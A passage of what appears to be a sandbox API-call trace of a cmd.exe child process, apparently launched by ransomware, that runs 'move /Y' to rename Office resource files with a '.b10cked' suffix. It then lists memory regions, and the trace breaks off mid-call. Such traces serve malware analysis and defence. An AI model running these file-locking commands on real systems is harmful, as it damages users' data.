GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.719] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f724 | out: lpFindFileData=0x26f724) returned 0x3a09f0 [0173.719] FindClose (in: hFindFile=0x3a09f0 | out: hFindFile=0x3a09f0) returned 1 [0173.719] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f724 | out: lpFindFileData=0x26f724) returned 0x3a09f0 [0173.719] 
FindClose (in: hFindFile=0x3a09f0 | out: hFindFile=0x3a09f0) returned 1 [0173.719] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f724 | out: lpFindFileData=0x26f724) returned 0x3a09f0 [0173.719] FindClose (in: hFindFile=0x3a09f0 | out: hFindFile=0x3a09f0) returned 1 [0173.719] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.720] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.720] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.720] GetEnvironmentStringsW () returned 0x3a0210* [0173.720] FreeEnvironmentStringsW (penv=0x3a0210) returned 1 [0173.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.720] GetConsoleOutputCP () returned 0x1b5 [0173.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.720] GetUserDefaultLCID () returned 0x409 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fae8, cchData=128 | out: lpLCData="0") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fae8, cchData=128 | out: lpLCData="0") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fae8, cchData=128 | out: lpLCData="1") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.721] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.721] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.722] GetConsoleTitleW (in: lpConsoleTitle=0x390930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.722] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.723] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.723] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.723] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.723] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.723] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.723] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.723] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.723] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.723] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.723] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.727] GetConsoleTitleW (in: lpConsoleTitle=0x26f7e0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.727] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.727] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.727] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.727] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.727] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.727] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.728] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.728] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.728] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.728] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.728] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.728] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.728] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.728] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.728] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.728] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.728] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.728] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.728] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.728] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.728] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.728] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.728] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.728] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.728] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.728] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.728] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.728] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.728] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0173.728] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.728] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.728] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.728] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.728] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.728] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.729] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.729] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.730] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f59c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f594, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f594*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.731] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.731] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.899] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.899] _wcsicmp (_String1="VISBRR~1.TRX", _String2=".") returned 72 [0173.899] _wcsicmp 
(_String1="VISBRR~1.TRX", _String2="..") returned 72 [0173.899] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrr~1.trx")) returned 0x2020 [0173.900] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.900] SetErrorMode (uMode=0x0) returned 0x0 [0173.900] SetErrorMode (uMode=0x1) returned 0x0 [0173.900] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", nBufferLength=0x104, lpBuffer=0x26ef24, lpFilePart=0x26ef0c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", lpFilePart=0x26ef0c*="VISBRR~1.TRX") returned 0x3c [0173.900] SetErrorMode (uMode=0x0) returned 0x1 [0173.900] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.900] _wcsicmp (_String1="VISBRR~1.TRX", _String2=".") returned 72 [0173.900] _wcsicmp (_String1="VISBRR~1.TRX", _String2="..") returned 72 [0173.900] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrr~1.trx")) returned 0x2020 [0173.900] SetErrorMode (uMode=0x0) returned 0x0 [0173.900] SetErrorMode (uMode=0x1) returned 0x0 [0173.900] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", nBufferLength=0x104, lpBuffer=0x26f3a0, lpFilePart=0x26f138 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", lpFilePart=0x26f138*="VISBRR~1.TRX") returned 0x3c [0173.900] SetErrorMode (uMode=0x0) returned 0x1 [0173.900] SetErrorMode (uMode=0x0) returned 0x0 [0173.900] SetErrorMode (uMode=0x1) returned 0x0 [0173.900] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f5a8, lpFilePart=0x26f138 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked", lpFilePart=0x26f138*="VISBRRES.DLL.trx_dll.b10cked") returned 0x4c [0173.900] SetErrorMode (uMode=0x0) returned 0x1 [0173.900] SetLastError (dwErrCode=0x0) [0173.900] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrres.dll.trx_dll.b10cked")) returned 0xffffffff [0173.900] GetLastError () returned 0x2 [0173.901] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x26eab4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eab4) returned 0x3a2130 [0173.901] FindNextFileW (in: hFindFile=0x3a2130, lpFindFileData=0x26eab4 | out: lpFindFileData=0x26eab4) returned 0 [0173.901] GetLastError () returned 0x12 [0173.901] FindClose (in: hFindFile=0x3a2130 | out: hFindFile=0x3a2130) returned 1 [0173.902] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3a1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1cc0) returned 0x3a2130 [0173.903] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0173.903] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x26ed4c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0173.903] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrres.dll.trx_dll")) returned 0x2020 [0173.903] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrres.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrres.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.903] FindClose (in: hFindFile=0x3a2130 | out: hFindFile=0x3a2130) returned 1 [0173.903] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ed00 | out: _Buffer=" 1") returned 9 [0173.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.903] GetFileType (hFile=0x7) returned 0x2 [0173.904] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.904] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ec8c | out: lpMode=0x26ec8c) returned 1 [0173.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.904] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ecc0 | out: lpConsoleScreenBufferInfo=0x26ecc0) returned 1 [0173.904] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.904] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ed00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.904] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x26ece4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ece4*=0x1a) returned 1 [0173.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.904] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.905] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.905] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.905] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.905] SetConsoleInputExeNameW () returned 0x1 [0173.905] GetConsoleOutputCP () returned 0x1b5 [0173.905] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.905] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.905] exit (_Code=0) Process: id = "305" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xa68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23688 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23689 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23690 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23691 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23692 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23693 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23694 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23695 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23696 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23697 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23814 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23815 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23816 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23817 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 23818 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 23819 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23820 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23821 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23822 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23823 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23824 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23825 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23826 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23827 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23828 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 23829 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23830 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23831 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23832 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23833 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 23834 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 23835 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 23836 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23837 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001170000" filename = "" Thread: id = 406 os_tid = 0xb18 [0173.752] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f94c | out: lpSystemTimeAsFileTime=0x16f94c*(dwLowDateTime=0x9d76b440, dwHighDateTime=0x1d440a9)) [0173.752] GetCurrentProcessId () returned 0xa68 [0173.752] GetCurrentThreadId () returned 0xb18 [0173.752] GetTickCount () returned 0x32931 [0173.752] QueryPerformanceCounter (in: lpPerformanceCount=0x16f944 | out: lpPerformanceCount=0x16f944*=23054135803) returned 1 [0173.753] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.753] __set_app_type (_Type=0x1) [0173.753] __p__fmode () returned 0x76b331f4 [0173.753] __p__commode () returned 0x76b331fc [0173.753] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.753] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.753] GetCurrentThreadId () returned 0xb18 [0173.753] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb18) returned 0x38 [0173.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.753] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.753] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.753] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.753] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f8dc | out: phkResult=0x16f8dc*=0x0) returned 0x2 [0173.754] VirtualQuery (in: lpAddress=0x16f913, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.754] VirtualQuery (in: 
